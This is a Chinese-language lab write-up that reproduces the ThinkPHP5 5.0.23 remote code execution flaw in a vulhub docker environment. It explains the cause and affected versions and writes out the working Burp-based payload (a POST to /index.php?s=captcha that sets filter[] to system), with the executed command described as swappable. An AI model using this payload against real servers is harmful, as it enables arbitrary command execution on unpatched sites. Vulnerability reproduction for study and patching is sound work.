ThinkPHP5 5.0.23 远程代码执行漏洞复现

ThinkPHP5 5.0.23 远程代码执行漏洞

0x01 形成原因

是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。 

0x02 影响的版本

5.0.23和5.1.31之前的所有版本

 0x03 启动环境

docker-compose up -d

访问靶机ip+端口号8080 

ThinkPHP5 5.0.23 远程代码执行漏洞复现_第1张图片

0x04 漏洞利用

使用burp抓到首页的包

ThinkPHP5 5.0.23 远程代码执行漏洞复现_第2张图片

改变传参方式  GET改为POST

ThinkPHP5 5.0.23 远程代码执行漏洞复现_第3张图片

修改参数

url参数

/index.php?s=captcha

post参数

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

id是我们执行的命令,可更换我们需要的命令 

ThinkPHP5 5.0.23 远程代码执行漏洞复现_第4张图片

将数据包发送出去

ThinkPHP5 5.0.23 远程代码执行漏洞复现_第5张图片

发现命令已经执行了

至此 ThinkPHP5 5.0.23 远程代码执行漏洞 复现成功

你可能感兴趣的:(vulhub漏洞复现,网络)